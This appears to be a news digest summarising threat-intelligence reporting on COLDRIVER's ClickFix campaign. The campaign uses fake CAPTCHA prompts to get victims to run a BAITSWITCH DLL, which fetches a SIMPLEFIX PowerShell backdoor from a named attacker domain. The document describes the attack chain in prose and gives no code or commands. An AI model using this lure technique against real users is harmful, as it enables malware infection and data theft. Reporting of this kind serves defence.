"COLDRIVER, also tracked as Callisto, Star Blizzard, and UNC4057, is the moniker assigned to a Russia-linked threat actor that's known to target a wide range of sectors since 2019. While early campaign waves were observed using spear-phishing lures to direct targets to credential harvesting pages, the group has been fleshing out its arsenal with custom tools like SPICA and LOSTKEYS, which underscores its technical sophistication."
"The adversary's use of ClickFix tactics was previously documented by the Google Threat Intelligence Group (GTIG) back in May 2025, using fake sites serving fake CAPTCHA verification prompts to trick the victim into executing a PowerShell command that's designed to deliver the LOSTKEYS Visual Basic Script. "The continued use of ClickFix suggests that it is an effective infection vector, even if it is neither novel nor technically advanced," Zscaler security researchers Sudeep Singh and Yin Hong Chang said in a report published this week."
"The latest attack chain follows the same modus operandi, tricking unsuspecting users into running a malicious DLL in the Windows Run dialog under the guise of completing a CAPTCHA check. The DLL, BAITSWITCH, reaches out to an attacker-controlled domain ("captchanom[.]top") to fetch the SIMPLEFIX backdoor, while a decoy document hosted on Google Drive is presented to the victims."
COLDRIVER conducted a multi-stage ClickFix-style campaign that uses BAITSWITCH and SIMPLEFIX. BAITSWITCH functions as a downloader that retrieves the SIMPLEFIX PowerShell backdoor from an attacker-controlled domain. The campaign uses fake CAPTCHA prompts and a decoy Google Drive document to trick users into running a malicious DLL via the Windows Run dialog. The malware makes HTTP requests to exfiltrate system information, receive commands to establish persistence, and store encrypted payloads in the Windows Registry. COLDRIVER has expanded its toolkit since 2019 with custom tools such as SPICA and LOSTKEYS, demonstrating increased technical capability.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]